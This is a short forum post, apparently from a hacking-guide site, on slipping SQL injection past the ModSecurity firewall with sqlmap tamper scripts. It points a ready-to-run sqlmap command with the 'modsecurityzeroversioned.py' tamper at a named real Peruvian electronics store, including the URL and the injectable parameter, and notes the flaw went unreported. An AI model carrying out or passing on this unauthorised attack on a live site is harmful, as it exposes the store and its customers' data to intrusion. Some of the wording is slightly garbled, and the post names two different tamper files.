Forum Thread: Evolve Mod_Security with SQLMAP Tampers

Hello !!
as everyone will have spent some time trying to make an injection for GET in a page and appears
appears the famous announcement of Mod_Security that does not let you inject.

But if you thought that was the end of the game is very wrong, there will always be SQLMAP to the rescue with its 47 Tampers (which are the ones that come by default in the latest version) which will get you out of more of a hurry ;).

For this example we will use "modsecurityversioned.py" (which only works with MySQL).

If you want more information about each one you have to go to sqlmap / tamper /, where you will find all available and within each file there is an explanation of its functionality

To use a Tamper in SQLMAP is very simple you should only add the option

Code:

-- tamper name

The example of injection we will do with a Peruvian page of sale of electronic articles (I hope do not bother them) D.

URL : https://impulso.com.pe
Tool : SQLMAP Tamper : modsecurityzeroversioned.py

Xploit :

Code:

sqlmap.py -u "https://impulso.com.pe/detalle_marca.php?marca_id=24&cat_id=5" --dbms "MySQL" -p "marca_id" --tamper "modsecurityzeroversioned.py" --batch

result

REPORTED : NO

Never Miss a Hacking or Security Guide

New Null Byte in your inbox, every week.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active